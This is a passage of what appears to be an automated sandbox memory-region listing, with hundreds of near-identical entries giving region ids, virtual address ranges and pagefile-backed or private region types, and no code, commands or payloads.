region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13670 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13671 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13672 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13673 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13704 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13705 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13706 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13707 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 13708 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 13709 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 13710 start_va = 0x2b0000 end_va = 0x2c2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 13711 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13712 start_va = 0x2a0000 end_va = 
0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13713 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13714 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13715 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13716 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13717 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13718 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13719 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13720 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13721 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13722 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13723 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13724 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13725 
start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13726 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13727 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13728 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13729 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13730 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13731 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13732 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13733 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13734 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13735 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13736 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13737 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" 
filename = "" Region: id = 13738 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13749 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13750 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13751 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13752 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13753 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13754 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13755 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13756 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13757 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13758 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13759 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13760 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x00000000002a0000" filename = "" Region: id = 13761 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13762 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13763 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13764 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13765 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13766 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13767 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13768 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13769 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13770 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13825 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 13826 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 13827 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = 
pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 13828 start_va = 0x2b0000 end_va = 0x2c3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 13829 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13830 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13831 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13832 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13833 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13834 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13835 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13836 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13837 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13838 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13839 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13840 start_va = 0x2a0000 end_va = 0x2b3fff 
entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13841 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13842 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13843 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13844 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13845 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13846 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13847 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13848 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13849 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13850 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13851 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13852 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13853 start_va 
= 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13854 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13855 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13856 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13857 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13858 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13859 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13860 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13861 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13862 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13863 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13864 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13865 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" 
Region: id = 13866 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13867 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13868 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13869 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13870 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13871 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13872 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13873 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13874 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13875 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13876 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13877 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 13878 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x0000000001800000" filename = "" Region: id = 13879 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 13880 start_va = 0x2b0000 end_va = 0x2c3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 13881 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13882 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13883 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13884 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13885 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13886 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13887 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13888 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13889 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13890 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13891 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 
region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13892 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13893 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13894 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13895 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13896 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13897 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13898 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13899 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13900 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13901 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13902 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13903 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13904 start_va = 0x2a0000 end_va 
= 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13905 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13906 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13907 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13908 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13909 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13910 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13911 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13912 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13913 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13914 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13915 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13916 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 
13917 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13918 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13919 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13920 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13921 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13922 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13923 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13924 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13925 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13926 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13927 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13928 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13929 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x00000000002a0000" filename = "" Region: id = 13930 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 14157 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 14158 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 14159 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 14160 start_va = 0x2b0000 end_va = 0x2c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 14161 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 14162 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 14163 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 14164 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 14165 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 14166 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 14167 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 14168 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = 
pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 14169 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 14170 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 14171 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 14172 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 14173 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 14174 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 14175 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 14176 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 14177 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 14178 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 14179 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 14180 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 14181 start_va = 0x2a0000 end_va = 0x2b1fff 
